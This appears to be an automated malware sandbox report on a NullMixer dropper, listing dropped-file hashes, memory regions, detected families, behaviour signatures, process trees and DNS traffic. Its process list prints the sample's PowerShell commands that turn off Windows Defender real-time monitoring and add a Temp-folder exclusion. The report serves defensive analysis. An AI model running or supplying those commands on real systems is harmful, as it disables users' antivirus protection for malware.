| SHA256 | 8b6540b22cc0be302f5c1e71de5d436a4036af18a55a0e4f185d0aaec6756d5c |
| SHA512 | 24c5808384fdb0ab8fe0b8b9e6a7fef6db39071c655f7dc6399aedf24d1e005a67e5285f752be29966de9078e47cf97427c67473fb88e0e78280b3d578a5e774 |
\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe
| MD5 | 7d7f14a1b3b8ee4e148e82b9c2f28aed |
| SHA1 | 649a29887915908dfba6bbcdaed2108511776b5a |
| SHA256 | 623a56a34174f3dcb179796205294124918996ccc8b56062b419ab8354df35cb |
| SHA512 | 585dda13cda86d077d28cdfbe799d4356967394e09a17e3ce406f557d14ec24f6b6cbdf0a7b2beaaae8743b2c545b898a12eeeeb56579b8fa560202a290370d3 |
memory/2692-104-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2692-103-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127ff3b5477.exe
| MD5 | cd6d011a663a12f81ba8e4e5407e3a6f |
| SHA1 | 53c81876f0ff422d41f19c6d2ea0d30548e4e071 |
| SHA256 | c303cb56a1c37e081b25cfec6b61829205cdd473deafed698bf725ca55a5b7a1 |
| SHA512 | 8b3228f725a3f49ab34bd36f09589ce682d1115acd212f9b6818708d59b263d9b83ec8e475f917df349449d5126a06ac1a55063f2946842639c0194412482738 |
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe
| MD5 | c7cd0def6982f7b281c6a61d29eec4be |
| SHA1 | f9f600d70d60cf79563e84cec0b883fa3f541690 |
| SHA256 | b2525fcbe771148a6c9b9db5786b8ab833391684eb1ac6152e0a311b2a7f3ab9 |
| SHA512 | 370c2bde411f188575177ca0821e5920496220785a6aac2e40b2a8d4a0f3151b5bca5e6e90688ba02780bbe1ea0bc1894588b10ff24e2c510254e38c0355b13b |
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe
| MD5 | 8268aa1cba3763a79c3dd333ab42c093 |
| SHA1 | e7d034e6f55bc07b38ad50f5bb2e83f098c60c97 |
| SHA256 | 7f6eef3d7d271decfd078c27b125d8c06dcd3a920f0e9edf8edf229ee1b2012f |
| SHA512 | 271797ad106169e7bbed9b70187d8b643ed7d164b7ed0049d3656334899ccb1bd19e4a4ec2fab9d5f00cad718a5248cf78ac976d9c032665d6758a2f8dd91195 |
\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe
| MD5 | 314e3dc1f42fb9d858d3db84deac9343 |
| SHA1 | dec9f05c3bcc759b76f4109eb369db9c9666834b |
| SHA256 | 79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08 |
| SHA512 | 23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2 |
memory/1440-137-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2692-105-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe
| MD5 | b33a3fb6b491b328dacaf18c302b20de |
| SHA1 | 41281e81ec9ba49af4af18f3c61038e62818d3c6 |
| SHA256 | 088d635941437ab637abea3d698c71dedf0f24d5dffd62f6b1fe4329b8e7de72 |
| SHA512 | a247cf6aa60d3cbacc46242a51793c6a6e3a3c00c1276af6b59d6b60ffb40d7915b09a9169a521f4326ecc622be29e71fb4cbe705f52e4e28e5d5802630b793e |
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe
| MD5 | b84f79adfccd86a27b99918413bb54ba |
| SHA1 | 06a61ab105da65f78aacdd996801c92d5340b6ca |
| SHA256 | 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49 |
| SHA512 | 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38 |
\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe
| MD5 | 343befc915e3428791029f5f314393b9 |
| SHA1 | 47701bb5f2f8b6c5135abccec790378c3986f555 |
| SHA256 | 4ca6bf1db2cb7f2f8799180ee8a56c2d96f718484a4ee3e06e32aebe6897c1da |
| SHA512 | 9381340ccad3ac5ce239908b3f90cd32ee1b835510d8ecc17b72049a49bb6613ed246d955d0a65f4970735f8cabcfd9af93417034a405d00ef193975cd1b2e5e |
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127d1be88dd70f8.exe
| MD5 | 3476b903e6e6ff5f246460e8749fd232 |
| SHA1 | 3639e6c1f104ad7aa24ab7f72aca5dad686361cf |
| SHA256 | 25cbf20f43b95afac49543b0dd5378626ab2c78f5edadd781441b335f9fc1002 |
| SHA512 | ac99a88b90e1396b2a8db98e56eb350ad95a8f8faa5b7b36862f603899aa9a8bd2a69d5abf3346158c6605f3475b4ab3366c644c7ab23dd5e436cc8951d0e026 |
\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b505de68357.exe
| MD5 | f4a5ef05e9978b2215c756154f9a3fdb |
| SHA1 | c933a1debeea407d608464b33588b19c299295c6 |
| SHA256 | d3a6b444ced1db9e9452bb5fc1f652b0d6b519948ed2e6e348036d2c25147f69 |
| SHA512 | f2d11f706d552c21b75f36c8e02edcb9251c95298986b17d48fb179f2f8d1e2e7ef99de9485ba7ee92dd118ad5759b6fa82197319a40b45044fdbdf039582d77 |
memory/2136-141-0x0000000001200000-0x0000000001226000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2G7PIUG5SR263X945YGX.temp
| MD5 | 237e86d133f57b8f0e5c235b90165404 |
| SHA1 | 097e472cb0ade2c1a953b898a89640b76f26d939 |
| SHA256 | d9ed6170cd22685a9cf2f8c896ea92943eb60f3884b9d5fbee1cbd83301e8666 |
| SHA512 | 0da7db83f8102dc6ce24acc32d99bbe06a1e8e36b19ab0b0c144a38315c5537d6cbce87af8f92f51d5b6fa32ebfb3fb8369a704d31fb0deaf5f5e8a8bf4d3a81 |
memory/1048-148-0x00000000028D0000-0x0000000002FC5000-memory.dmp
memory/1416-149-0x0000000000400000-0x0000000000AF5000-memory.dmp
memory/1772-150-0x0000000000400000-0x00000000004D8000-memory.dmp
memory/3028-140-0x0000000000800000-0x0000000000808000-memory.dmp
memory/1416-152-0x0000000001260000-0x0000000001955000-memory.dmp
memory/1416-153-0x0000000001260000-0x0000000001955000-memory.dmp
memory/1996-156-0x0000000000380000-0x00000000003E8000-memory.dmp
memory/1384-157-0x00000000002D0000-0x0000000000338000-memory.dmp
memory/2136-168-0x0000000000440000-0x0000000000446000-memory.dmp
memory/2028-169-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1680-171-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1672-172-0x0000000004F20000-0x000000000532F000-memory.dmp
memory/1440-177-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/2692-102-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2692-100-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2692-96-0x0000000000400000-0x000000000051C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-BLA5Q.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/1416-189-0x0000000000400000-0x0000000000AF5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-BLA5Q.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe
| MD5 | 1fd5c6ee4e5c6af11015087d8d6af3b0 |
| SHA1 | 21aef092eb546d508740185e38b52896fb6aea5d |
| SHA256 | d41f88572be0063290efe714d45528ba9d467ac89e066d88f13e13a7325bc663 |
| SHA512 | 5074aafa3d7030713940aa9436b1c96fdef2e7df52c68f5d97203fe0ec3af7055934e6b6cac5ba95c69310e037863b16759b1f475c4e42ab61e9acb7ed387975 |
memory/2136-191-0x0000000000460000-0x0000000000478000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe
| MD5 | 3bb8763cc667a751d1653cc3634f1f83 |
| SHA1 | d2e0dc47a6085864ec65ec0fa326b4434bd7f376 |
| SHA256 | f369798e25e4c2dd109caf27fb399d2f32200e07a5550fdb48816daaa5563843 |
| SHA512 | 1c5800e5b80775f33ad55a13418c039b3c56b8e532ccf8d5895c5a4e904731f76104ff6469075d093f39c902364bb8c19d048a3a4aa6b2893e03ebc4e41f160e |
memory/2136-192-0x0000000000470000-0x0000000000476000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe
| MD5 | 5cd1e88d510f00080fecc9d52fb97ba3 |
| SHA1 | c2d8521c2ec33026df1f07a0214b422ce12f702d |
| SHA256 | f22839eb0904705653bdfcd8c144867c3c02ab09096614652280d4d1c323e470 |
| SHA512 | d2207c819f028843b416e857e9dc47fa3b553f5c9955bf0ffc6dbb6e05e75cc85b5b133cc86c373182dc00f16111b6d51cfd67698c9a699ae866497ddc75a195 |
memory/1416-197-0x0000000000D40000-0x0000000000D41000-memory.dmp
memory/1416-220-0x0000000003C80000-0x0000000003C81000-memory.dmp
memory/1416-222-0x0000000003C80000-0x0000000003C81000-memory.dmp
memory/1416-217-0x0000000003000000-0x0000000003001000-memory.dmp
memory/1416-223-0x0000000000400000-0x0000000000AF5000-memory.dmp
memory/1416-215-0x0000000003000000-0x0000000003001000-memory.dmp
memory/1416-212-0x0000000002F50000-0x0000000002F51000-memory.dmp
memory/1416-210-0x0000000002F50000-0x0000000002F51000-memory.dmp
memory/1416-207-0x0000000002EA0000-0x0000000002EA1000-memory.dmp
memory/1416-205-0x0000000002EA0000-0x0000000002EA1000-memory.dmp
memory/1416-202-0x0000000002DF0000-0x0000000002DF1000-memory.dmp
memory/1416-200-0x0000000002DF0000-0x0000000002DF1000-memory.dmp
memory/1416-198-0x0000000002DF0000-0x0000000002DF1000-memory.dmp
memory/1416-195-0x0000000000D40000-0x0000000000D41000-memory.dmp
memory/1416-193-0x0000000000D40000-0x0000000000D41000-memory.dmp
memory/448-226-0x0000000000400000-0x0000000002B41000-memory.dmp
memory/608-241-0x0000000002930000-0x0000000002DEE000-memory.dmp
memory/608-243-0x0000000002EF0000-0x0000000002F9E000-memory.dmp
memory/2924-256-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2884-269-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2924-246-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2924-244-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1048-278-0x00000000028D0000-0x0000000002FC5000-memory.dmp
memory/1416-279-0x0000000000400000-0x0000000000AF5000-memory.dmp
memory/1416-280-0x0000000001260000-0x0000000001955000-memory.dmp
memory/3044-310-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Program Files (x86)\Gparted\Build.exe
| MD5 | c874508845d1c0bb486f5e41af8de480 |
| SHA1 | 3ac7e246934ba74c1018d50138bea77b035d6f90 |
| SHA256 | 4793a9e954f00007a2f352648cddbc30add3ff4b7f22c3e1500d3671b0eb36be |
| SHA512 | 80daa52fea184748c4b858af4c7a676dddddf4c3cfdfada44917abddb0495ab22a9728800ea7f408fb3e66c269eda9df2462a9f82cf6a57c254d6c233c46f758 |
memory/2172-352-0x0000000000570000-0x0000000000578000-memory.dmp
memory/2172-350-0x0000000000BD0000-0x0000000000BF2000-memory.dmp
C:\Program Files (x86)\Gparted\gimagex.exe
| MD5 | 85199ea4a530756b743ad4491ea84a44 |
| SHA1 | 0842cd749986d65d400a9605d17d2ed7a59c13cc |
| SHA256 | 3ea24d7899169c28d505233e13b9c92b51cd1181be299487392700d29e13b9aa |
| SHA512 | b82b1c0ba24fa3e4c1f5309eee4cc6be0dfcc20f64886a40e4eb35d804f36af864b3e4218d7f27f439fa45659af0d69410798c9b3d1e5cab5a259759b7ad1f99 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\56ZKHKVYOPUXMOMP5SR3.temp
| MD5 | 677b8bc16975a2d8f4d553257c6f89e1 |
| SHA1 | e7f5c2a612f74f743ce3e0bc6be1921766d8e8b5 |
| SHA256 | f22d2ca8ab0c494a77a9e691a0541daf51c7d3e4de134fc27ef095983412575c |
| SHA512 | 67b07b3b1d019a4ef96afe4ebfbda635a73d05a78d506b27f98b89287793105c25a87e8e27d81128a49d66f5f97ce5b6ef91d5e1897cb0998cc31c9ab302e2d0 |
memory/1912-395-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
memory/1912-407-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab38BC.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar38DF.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | fafbf2197151d5ce947872a4b0bcbe16 |
| SHA1 | a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020 |
| SHA256 | feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71 |
| SHA512 | acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 21:27
Reported
2024-11-09 21:30
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe
"C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe"
C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue121e696b2d94fe.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue120ba2d3df.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue12b645e6648.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue127d1be88dd70f8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue12b505de68357.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue12536443c2c8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1239d4b60d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1264f7b252.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue129ba086d712.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue125fd9410f80dd6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue127ff3b5477.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue123e8bf9beda40e5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue12d6c3a590f5c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue122eaa5d903b51f3.exe /mixtwo
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue12f72da5484b.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe
| MD5 | 653f5bbaac95d546bb4c5c7557b25c22 |
| SHA1 | 346e064735ca5abe0963288dd342d7ea058bb61a |
| SHA256 | d427e3e6fb34458f934fbe1f61ee8a480f84d2d20bf3fcc436e772593d2d5f12 |
| SHA512 | 1feeab3ade970823abba275110655beac744eb34e59a47c7058bccde0beb699999f627e7b1abbee1f76db6a3e4780781fe3b88c7c798a5639d6b458d35f6a446 |
C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/4620-62-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4620-65-0x0000000064940000-0x0000000064959000-memory.dmp
memory/4620-73-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4620-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4620-72-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4620-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3088-74-0x0000000073DDE000-0x0000000073DDF000-memory.dmp
memory/4620-68-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4620-67-0x000000006FE40000-0x000000006FFC6000-memory.dmp
